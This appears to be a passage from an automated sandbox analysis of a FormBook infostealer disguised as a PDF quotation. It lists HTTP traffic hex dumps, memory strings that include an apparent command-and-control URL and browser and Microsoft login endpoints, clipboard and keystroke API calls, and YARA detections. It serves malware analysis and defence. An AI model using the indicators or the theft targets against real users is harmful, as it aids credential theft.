                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:14:33 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:14:36 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:14:38 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:14:41 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 162Content-Type: text/html;charset=utf-8Date: Mon, 18 Nov 2024 12:14:48 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 162Content-Type: text/html;charset=utf-8Date: Mon, 18 Nov 2024 12:14:50 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 162Content-Type: text/html;charset=utf-8Date: Mon, 18 Nov 2024 12:14:53 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 162Content-Type: text/html;charset=utf-8Date: Mon, 18 Nov 2024 12:14:56 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
                Source: xvYhLzczmazJ.exe, 0000000C.00000002.3137237939.00000000052A4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mdpc7.top
                Source: xvYhLzczmazJ.exe, 0000000C.00000002.3137237939.00000000052A4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mdpc7.top/55tt/
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000004BA4000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.0000000003E74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RMActivate_isv.exe, 0000000B.00000002.3135956729.00000000043CA000.00000004.10000000.00040000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3138038480.0000000006420000.00000004.00000800.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.000000000369A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Z
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: RMActivate_isv.exe, 0000000B.00000003.1891152849.0000000007ED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: RMActivate_isv.exe, 0000000B.00000002.3135956729.00000000040A6000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.0000000003376000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.0000000028E66000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0045A10F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0045A10F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,2_2_0046DC80
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,2_2_0044C37A
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0047C81C

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
